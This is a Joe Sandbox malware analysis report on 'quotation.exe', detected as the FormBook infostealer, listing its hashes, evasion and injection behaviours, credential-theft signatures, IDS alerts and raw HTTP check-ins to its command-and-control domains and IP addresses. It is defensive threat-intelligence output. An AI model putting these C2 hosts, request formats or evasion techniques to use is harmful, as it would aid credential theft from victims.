Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
quotation.exe

Overview

General Information

Sample name:quotation.exe
Analysis ID:1567392
MD5:fb56fbfa78c904b961a8db42b7ac648d
SHA1:a4400e1e8e97fec1a68290b24aea4250189610ef
SHA256:c8135636799971efa2fe543c693f96ab2238d38b140d1da6a07727231161a765
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • quotation.exe (PID: 2364 cmdline: "C:\Users\user\Desktop\quotation.exe" MD5: FB56FBFA78C904B961A8DB42B7AC648D)
    • quotation.exe (PID: 5368 cmdline: "C:\Users\user\Desktop\quotation.exe" MD5: FB56FBFA78C904B961A8DB42B7AC648D)
      • gkTgnrvdOG.exe (PID: 4228 cmdline: "C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • SearchProtocolHost.exe (PID: 5416 cmdline: "C:\Windows\SysWOW64\SearchProtocolHost.exe" MD5: 727FE964E574EEAF8917308FFF0880DE)
          • gkTgnrvdOG.exe (PID: 3680 cmdline: "C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.quotation.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              3.2.quotation.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:13:59.664590+010028554651A Network Trojan was detected192.168.2.54975427.124.4.24680TCP
                2024-12-03T14:14:26.423986+010028554651A Network Trojan was detected192.168.2.549817156.232.181.15580TCP
                2024-12-03T14:14:41.763701+010028554651A Network Trojan was detected192.168.2.549856185.27.134.20680TCP
                2024-12-03T14:14:57.142388+010028554651A Network Trojan was detected192.168.2.54989088.99.61.5280TCP
                2024-12-03T14:15:11.930768+010028554651A Network Trojan was detected192.168.2.549923104.21.90.13780TCP
                2024-12-03T14:15:26.767942+010028554651A Network Trojan was detected192.168.2.549958209.74.77.10780TCP
                2024-12-03T14:15:41.724345+010028554651A Network Trojan was detected192.168.2.549993176.32.38.13080TCP
                2024-12-03T14:15:56.861807+010028554651A Network Trojan was detected192.168.2.550009161.97.168.24580TCP
                2024-12-03T14:16:12.663682+010028554651A Network Trojan was detected192.168.2.550013103.75.185.2280TCP
                2024-12-03T14:16:27.647591+010028554651A Network Trojan was detected192.168.2.550017155.94.253.480TCP
                2024-12-03T14:16:43.000879+010028554651A Network Trojan was detected192.168.2.550021208.91.197.2780TCP
                2024-12-03T14:16:57.765590+010028554651A Network Trojan was detected192.168.2.550025217.160.0.20080TCP
                2024-12-03T14:17:16.246315+010028554651A Network Trojan was detected192.168.2.550029154.70.82.24680TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-03T14:14:18.102307+010028554641A Network Trojan was detected192.168.2.549798156.232.181.15580TCP
                2024-12-03T14:14:20.758442+010028554641A Network Trojan was detected192.168.2.549805156.232.181.15580TCP
                2024-12-03T14:14:23.414703+010028554641A Network Trojan was detected192.168.2.549811156.232.181.15580TCP
                2024-12-03T14:14:33.522702+010028554641A Network Trojan was detected192.168.2.549837185.27.134.20680TCP
                2024-12-03T14:14:36.197554+010028554641A Network Trojan was detected192.168.2.549843185.27.134.20680TCP
                2024-12-03T14:14:38.897749+010028554641A Network Trojan was detected192.168.2.549850185.27.134.20680TCP
                2024-12-03T14:14:49.148040+010028554641A Network Trojan was detected192.168.2.54987488.99.61.5280TCP
                2024-12-03T14:14:51.843228+010028554641A Network Trojan was detected192.168.2.54987988.99.61.5280TCP
                2024-12-03T14:14:54.482737+010028554641A Network Trojan was detected192.168.2.54988588.99.61.5280TCP
                2024-12-03T14:15:03.797325+010028554641A Network Trojan was detected192.168.2.549903104.21.90.13780TCP
                2024-12-03T14:15:06.530520+010028554641A Network Trojan was detected192.168.2.549910104.21.90.13780TCP
                2024-12-03T14:15:09.258879+010028554641A Network Trojan was detected192.168.2.549916104.21.90.13780TCP
                2024-12-03T14:15:18.822371+010028554641A Network Trojan was detected192.168.2.549939209.74.77.10780TCP
                2024-12-03T14:15:21.466554+010028554641A Network Trojan was detected192.168.2.549945209.74.77.10780TCP
                2024-12-03T14:15:23.844049+010028554641A Network Trojan was detected192.168.2.549952209.74.77.10780TCP
                2024-12-03T14:15:33.635830+010028554641A Network Trojan was detected192.168.2.549974176.32.38.13080TCP
                2024-12-03T14:15:36.346790+010028554641A Network Trojan was detected192.168.2.549980176.32.38.13080TCP
                2024-12-03T14:15:39.006954+010028554641A Network Trojan was detected192.168.2.549987176.32.38.13080TCP
                2024-12-03T14:15:48.792520+010028554641A Network Trojan was detected192.168.2.550006161.97.168.24580TCP
                2024-12-03T14:15:51.495367+010028554641A Network Trojan was detected192.168.2.550007161.97.168.24580TCP
                2024-12-03T14:15:54.185697+010028554641A Network Trojan was detected192.168.2.550008161.97.168.24580TCP
                2024-12-03T14:16:04.430200+010028554641A Network Trojan was detected192.168.2.550010103.75.185.2280TCP
                2024-12-03T14:16:07.104583+010028554641A Network Trojan was detected192.168.2.550011103.75.185.2280TCP
                2024-12-03T14:16:09.773914+010028554641A Network Trojan was detected192.168.2.550012103.75.185.2280TCP
                2024-12-03T14:16:19.610664+010028554641A Network Trojan was detected192.168.2.550014155.94.253.480TCP
                2024-12-03T14:16:22.265274+010028554641A Network Trojan was detected192.168.2.550015155.94.253.480TCP
                2024-12-03T14:16:24.994548+010028554641A Network Trojan was detected192.168.2.550016155.94.253.480TCP
                2024-12-03T14:16:34.591819+010028554641A Network Trojan was detected192.168.2.550018208.91.197.2780TCP
                2024-12-03T14:16:37.336818+010028554641A Network Trojan was detected192.168.2.550019208.91.197.2780TCP
                2024-12-03T14:16:39.982733+010028554641A Network Trojan was detected192.168.2.550020208.91.197.2780TCP
                2024-12-03T14:16:49.806431+010028554641A Network Trojan was detected192.168.2.550022217.160.0.20080TCP
                2024-12-03T14:16:52.462477+010028554641A Network Trojan was detected192.168.2.550023217.160.0.20080TCP
                2024-12-03T14:16:55.183068+010028554641A Network Trojan was detected192.168.2.550024217.160.0.20080TCP
                2024-12-03T14:17:06.539514+010028554641A Network Trojan was detected192.168.2.550026154.70.82.24680TCP
                2024-12-03T14:17:09.212414+010028554641A Network Trojan was detected192.168.2.550027154.70.82.24680TCP
                2024-12-03T14:17:11.899708+010028554641A Network Trojan was detected192.168.2.550028154.70.82.24680TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.5tuohbpzyj9.buzz/abgi/Avira URL Cloud: Label: malware
                Source: http://www.5tuohbpzyj9.buzz/abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEjAvira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: quotation.exeReversingLabs: Detection: 39%
                Yara detected FormBook
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.quotation.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.2381813983.0000000001110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2381205965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4522340469.0000000004A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4519120021.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520387201.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4520451404.0000000002F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.2382864377.0000000001790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.4520455593.00000000030F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: quotation.exeJoe Sandbox ML: detected
                Source: quotation.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: quotation.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: gkTgnrvdOG.exe, 00000005.00000002.4519132239.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp, gkTgnrvdOG.exe, 00000007.00000002.4520216531.0000000000B5E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: quotation.exe, quotation.exe, 00000003.00000002.2381927769.0000000001280000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, SearchProtocolHost.exe, 00000006.00000003.2381531923.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.000000000336E000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000002.4520682984.00000000031D0000.00000040.00001000.00020000.00000000.sdmp, SearchProtocolHost.exe, 00000006.00000003.2384137153.0000000003024000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdbUGP source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: SearchProtocolHost.pdb source: gkTgnrvdOG.exe, 00000005.00000003.2320609449.000000000152B000.00000004.00000001.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 6_2_02A2C860 FindFirstFileW,FindNextFileW,FindClose,6_2_02A2C860
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then xor eax, eax6_2_02A19EA0
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 4x nop then mov ebx, 00000004h6_2_035204E8

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49754 -> 27.124.4.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49817 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49798 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49856 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49843 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49805 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49837 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49850 -> 185.27.134.206:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49811 -> 156.232.181.155:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49879 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49874 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49916 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49890 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49903 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49910 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49923 -> 104.21.90.137:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49945 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49974 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49952 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49958 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49885 -> 88.99.61.52:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49980 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50025 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50009 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 155.94.253.4:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 161.97.168.245:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50020 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50013 -> 103.75.185.22:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 155.94.253.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49993 -> 176.32.38.130:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49939 -> 209.74.77.107:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50016 -> 155.94.253.4:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50021 -> 208.91.197.27:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50024 -> 217.160.0.200:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50029 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50028 -> 154.70.82.246:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50017 -> 155.94.253.4:80
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.acc888ommodate.xyz
                Source: Joe Sandbox ViewIP Address: 209.74.77.107 209.74.77.107
                Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                Source: Joe Sandbox ViewASN Name: CAFENETTG CAFENETTG
                Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /8s5b/?dfxXf=5pgPlrExEj&PLpD=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcXPh9Hn1ejjtAgVduAuRdjiHqSVqAGkyfP7Q6Thm3wMBkWQ== HTTP/1.1Host: www.laohub10.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /abgi/?PLpD=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flCIvo6AFeM2/skelSXUCscL7c+OC82gfnX3ulNzXIVMD/Pg==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.5tuohbpzyj9.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /4d2l/?PLpD=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMD88Lp4PQNylErUlYa6FSt3/cQZlayrlv3UKLh53gU+l17w==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.canadavinreport.siteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /ogj2/?PLpD=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9cY7ZSSO0fgv4aLrmeCdeR22hUyiHphs3+UPMeFnjEXz3Vw==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.phoenix88.sbsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /eaqq/?dfxXf=5pgPlrExEj&PLpD=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kXPn7ceVjctqreHfWNCCIV/k5akwvaRS8zM+YQ4ALen/wBg== HTTP/1.1Host: www.ana-silverco.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /8q8w/?PLpD=oPmfzDvAiIeWP+dhDQf7HSaIzNrTwSyGpfszxH4jrRMMDKwng/5cFIiPa/6rGZsshFiqp6GKP0fVbj+TeZ8okB+i6TciPkxAVomi9Bq2BL+qGFtNXm3IZasYXFTCdN4piQ==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.gadgetre.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /j1io/?dfxXf=5pgPlrExEj&PLpD=G6oz2WtW4adnoUNHm0mpcP4B2HtbwCYrrTmm8dHHgSuel3cEdmkBtbgCn6689YtHvLupKFRUL3t0MGFKqSataAi40vaJPFabO5lnHnDp1UEVdOTWmoEEbAO8Jrg/lBqLiQ== HTTP/1.1Host: www.acc888ommodate.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
                Source: global trafficHTTP traffic detected: GET /qrcg/?PLpD=1fKHCnrcuLb+woCu5SHdUNHs45cyPNHAmKr2RbCfVfhm3PNz+rp77RggAVXwPiu1rMLErXVWwt2AmyUPU1kZHbinTcvoliy7Dmh5Jg4zqF2ez6vORVKEMmKyq03H3aWHiQ==&dfxXf=5pgPlrExEj HTTP/1.1Host: www.nb-shenshi.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Connection: closeUser-Agent: Mozilla/5.0 (BB10; Touch) AppleWebKit/537.35+ (KHTML, like Gecko) Version/10.3.2.2252 Mobile Safari/537.35+
